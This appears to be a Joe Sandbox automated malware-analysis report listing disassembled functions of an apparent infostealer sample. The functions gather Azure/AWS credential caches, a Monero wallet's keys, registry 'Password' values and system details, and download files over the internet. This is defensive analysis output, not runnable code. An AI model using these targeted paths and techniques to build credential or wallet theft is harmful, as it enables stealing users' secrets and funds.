StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00055857

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00055228

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 000552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00055318
Part of subcall function 000552C0: lstrlen.KERNEL32(00000000), ref: 0005532F
Part of subcall function 000552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00055364
Part of subcall function 000552C0: lstrlen.KERNEL32(00000000), ref: 00055383
Part of subcall function 000552C0: lstrlen.KERNEL32(00000000), ref: 000553AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0005578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00055940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00055A0C
Sleep.KERNEL32(0000EA60), ref: 00055A1B

Strings

ERROR, xrefs: 00055693
ERROR, xrefs: 00055636
ERROR, xrefs: 0005577D
ERROR, xrefs: 00055849
ERROR, xrefs: 000559FE
ERROR, xrefs: 00055932

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 87b6b9a33dd4580f98a57e73a4912b5f1f4c7f37dd571407fa49933110dc1552
Instruction ID: d7518b3340fd3cdf09bc580b4541ca7ec7ac69298c768be6121f8ec7bca601ec
Opcode Fuzzy Hash: 87b6b9a33dd4580f98a57e73a4912b5f1f4c7f37dd571407fa49933110dc1552
Instruction Fuzzy Hash: 7DE13375A105089ADB14FBB0EC56AFF7378BF55302F508229B90656093EF346E4DCBA2

Function 00054D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

lstrcat.KERNEL32(?,00000000), ref: 00054DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00054DCD

Part of subcall function 00054910: wsprintfA.USER32 ref: 0005492C
Part of subcall function 00054910: FindFirstFileA.KERNEL32(?,?), ref: 00054943

lstrcat.KERNEL32(?,00000000), ref: 00054E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00054E59

Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FDC), ref: 00054971
Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FE0), ref: 00054987
Part of subcall function 00054910: FindNextFileA.KERNEL32(000000FF,?), ref: 00054B7D
Part of subcall function 00054910: FindClose.KERNEL32(000000FF), ref: 00054B92

lstrcat.KERNEL32(?,00000000), ref: 00054EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00054EE5

Part of subcall function 00054910: wsprintfA.USER32 ref: 000549B0
Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,000608D2), ref: 000549C5
Part of subcall function 00054910: wsprintfA.USER32 ref: 000549E2
Part of subcall function 00054910: PathMatchSpecA.SHLWAPI(?,?), ref: 00054A1E
Part of subcall function 00054910: lstrcat.KERNEL32(?,00CEF1E8), ref: 00054A4A
Part of subcall function 00054910: lstrcat.KERNEL32(?,00060FF8), ref: 00054A5C
Part of subcall function 00054910: lstrcat.KERNEL32(?,?), ref: 00054A70
Part of subcall function 00054910: lstrcat.KERNEL32(?,00060FFC), ref: 00054A82
Part of subcall function 00054910: lstrcat.KERNEL32(?,?), ref: 00054A96
Part of subcall function 00054910: CopyFileA.KERNEL32(?,?,00000001), ref: 00054AAC
Part of subcall function 00054910: DeleteFileA.KERNEL32(?), ref: 00054B31

Strings

Azure\.IdentityService, xrefs: 00054EEB
*.*, xrefs: 00054DD8
\.IdentityService\, xrefs: 00054ED9
Azure\.aws, xrefs: 00054E5F
\.aws\, xrefs: 00054E4D
\.azure\, xrefs: 00054DC1
*.*, xrefs: 00054E64
msal.cache, xrefs: 00054EF0
Azure\.azure, xrefs: 00054DD3

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: dda101162f947ac62430bfec4a1a519d49d20bf3acce66be82c0a794d17c205a
Instruction ID: b97c35ed2f53e35736d2329e2e8b0488658cb6dbe5f472194dd2e5873a253cf9
Opcode Fuzzy Hash: dda101162f947ac62430bfec4a1a519d49d20bf3acce66be82c0a794d17c205a
Instruction Fuzzy Hash: 244174B9A4020467DB10F770EC5BFEE7338AB64701F404554B6456A0C2EEB45BCDCBA2

Function 00041310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000412B4
Part of subcall function 000412A0: RtlAllocateHeap.NTDLL(00000000), ref: 000412BB
Part of subcall function 000412A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000412D7
Part of subcall function 000412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000412F5
Part of subcall function 000412A0: RegCloseKey.ADVAPI32(?), ref: 000412FF

lstrcat.KERNEL32(?,00000000), ref: 0004134F
lstrlen.KERNEL32(?), ref: 0004135C
lstrcat.KERNEL32(?,.keys), ref: 00041377

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 00058B60: GetSystemTime.KERNEL32(00060E1A,00CE9808,000605AE,?,?,000413F9,?,0000001A,00060E1A,00000000,?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 00058B86

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00041465

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000499EC
Part of subcall function 000499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00049A11
Part of subcall function 000499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00049A31
Part of subcall function 000499C0: ReadFile.KERNEL32(000000FF,?,00000000,0004148F,00000000), ref: 00049A5A
Part of subcall function 000499C0: LocalFree.KERNEL32(0004148F), ref: 00049A90
Part of subcall function 000499C0: CloseHandle.KERNEL32(000000FF), ref: 00049A9A

DeleteFileA.KERNEL32(00000000), ref: 000414EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00041335
\Monero\wallet.keys, xrefs: 0004138D
wallet_path, xrefs: 00041330
.keys, xrefs: 0004136B

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: cb686bed2f55baa31fb8edf2b63c5d11e36b5b246c9fc0206f2c401c38c2de46
Instruction ID: 510f2f10814fbfd907e81b52047c6f6e72a58435d52fbdf3cead3d08d3d25201
Opcode Fuzzy Hash: cb686bed2f55baa31fb8edf2b63c5d11e36b5b246c9fc0206f2c401c38c2de46
Instruction Fuzzy Hash: 1C5157B1E5011857CB15FB60DD96FEE733CAF54301F4042A8B60A62082EE345B8DCBA6

Function 000475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000472D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0004733A
Part of subcall function 000472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000473B1
Part of subcall function 000472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0004740D
Part of subcall function 000472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00047452
Part of subcall function 000472D0: HeapFree.KERNEL32(00000000), ref: 00047459

lstrcat.KERNEL32(354C8020,000617FC), ref: 00047606
lstrcat.KERNEL32(354C8020,00000000), ref: 00047648
lstrcat.KERNEL32(354C8020, : ), ref: 0004765A
lstrcat.KERNEL32(354C8020,00000000), ref: 0004768F
lstrcat.KERNEL32(354C8020,00061804), ref: 000476A0
lstrcat.KERNEL32(354C8020,00000000), ref: 000476D3
lstrcat.KERNEL32(354C8020,00061808), ref: 000476ED
task.LIBCPMTD ref: 000476FB

Strings

: , xrefs: 0004764E

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: a9653b4e0a0dfefd37f1bf7e4083b10b9d8caabf2c4fd63b7c9f21f631cebc22
Instruction ID: d81759704d64ff188024823b0d1b306bcb2b118ca4265af1c178eee65e18c10d
Opcode Fuzzy Hash: a9653b4e0a0dfefd37f1bf7e4083b10b9d8caabf2c4fd63b7c9f21f631cebc22
Instruction Fuzzy Hash: 71316EB5A01109DFDB04EBB4EC89DFF7379BB44301B144529F102A72A2EF34A946CB65

Function 00057500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00057542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0005757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057603
RtlAllocateHeap.NTDLL(00000000), ref: 0005760A
wsprintfA.USER32 ref: 00057640

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Strings

C, xrefs: 0005754C
:, xrefs: 0005755C
\, xrefs: 00057560

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 3ec7969b6c2be3bf00b9fb7026e862b2b41d102ca7ff35e3f4861cdce9e33415
Instruction ID: 11d3f00737669222ee6e357b069f4f0f8edecd81aa3b749b9f711a0e02b38833
Opcode Fuzzy Hash: 3ec7969b6c2be3bf00b9fb7026e862b2b41d102ca7ff35e3f4861cdce9e33415
Instruction Fuzzy Hash: 9F41C3B1D04248EBDF10DF94DC49BDEBBB8EF08701F104199F90967281EB74AA48CBA1

Function 00058100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CEED40,00000000,?,00060E2C,00000000,?,00000000), ref: 00058130
RtlAllocateHeap.NTDLL(00000000), ref: 00058137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00058158
__aulldiv.LIBCMT ref: 00058172
__aulldiv.LIBCMT ref: 00058180
wsprintfA.USER32 ref: 000581AC

Strings

%d MB, xrefs: 000581A3
@, xrefs: 0005814D

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 6e5e600c1c6e3b33333b00176ca90bf8907f774e2310f6065aabb20fcdfa5091
Instruction ID: ba9d17f648153ffd687f9dfd883e46c879e9c09f993aba0a3a229691a55d3a49
Opcode Fuzzy Hash: 6e5e600c1c6e3b33333b00176ca90bf8907f774e2310f6065aabb20fcdfa5091
Instruction Fuzzy Hash: 33211DB1E44218ABEB10DFD4DC49FAFB7B8FB44B11F10450AFA05BB280DB7859058BA5

Function 000460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
Part of subcall function 000447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

InternetOpenA.WININET(00060DF7,00000001,00000000,00000000,00000000), ref: 0004610F
StrCmpCA.SHLWAPI(?,00CEF068), ref: 00046147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0004618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000461B3
InternetReadFile.WININET(?,?,00000400,?), ref: 000461DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0004620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00046249
InternetCloseHandle.WININET(?), ref: 00046253
InternetCloseHandle.WININET(00000000), ref: 00046260

Memory Dump Source

